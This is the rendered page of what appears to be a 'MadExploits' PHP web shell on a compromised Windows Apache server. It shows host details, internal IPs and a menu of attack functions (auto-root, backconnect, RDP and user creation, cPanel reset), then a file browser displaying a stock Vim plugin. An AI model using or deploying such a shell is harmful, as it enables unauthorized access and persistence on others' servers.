Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
laragon /
bin /
git /
usr /
share /
vim /
vim82 /
plugin /
[ HOME SHELL ]
Name
Size
Permission
Action
README.txt
976
B
-rw-rw-rw-
getscriptPlugin.vim
1.36
KB
-rw-rw-rw-
gzip.vim
2.97
KB
-rw-rw-rw-
logiPat.vim
10.03
KB
-rw-rw-rw-
manpager.vim
1.31
KB
-rw-rw-rw-
matchparen.vim
7.07
KB
-rw-rw-rw-
netrwPlugin.vim
10.49
KB
-rw-rw-rw-
rrhelper.vim
1.38
KB
-rw-rw-rw-
spellfile.vim
499
B
-rw-rw-rw-
tarPlugin.vim
2.34
KB
-rw-rw-rw-
tohtml.vim
12.29
KB
-rw-rw-rw-
vimballPlugin.vim
2.83
KB
-rw-rw-rw-
zipPlugin.vim
2.55
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : manpager.vim
" Vim plugin for using Vim as manpager. " Maintainer: Enno Nagel <ennonagel+vim@gmail.com> " Last Change: 2022 Jun 17 " Set up the current buffer (likely read from stdin) as a manpage command MANPAGER call s:ManPager() function s:ManPager() " global options, keep these to a minimum to avoid side effects if &compatible set nocompatible endif if exists('+viminfofile') set viminfofile=NONE endif syntax on " Make this an unlisted, readonly scratch buffer setlocal buftype=nofile noswapfile bufhidden=hide nobuflisted readonly " Is this useful? Should allow for using K on word with a colon. setlocal iskeyword+=: " Ensure text width matches window width setlocal foldcolumn& nofoldenable nonumber norelativenumber " In case Vim was invoked with -M setlocal modifiable " Emulate 'col -b' silent! keepj keepp %s/\v(.)\b\ze\1?//ge " Remove ansi sequences silent! keepj keepp %s/\v\e\[%(%(\d;)?\d{1,2})?[mK]//ge " Remove empty lines above the header call cursor(1, 1) let n = search(".*(.*)", "c") if n > 1 exe "1," . n-1 . "d" endif " Finished preprocessing the buffer, prevent any further modifications setlocal nomodified nomodifiable " Set filetype to man even if ftplugin is disabled setlocal iskeyword+=: filetype=man runtime ftplugin/man.vim endfunction
Close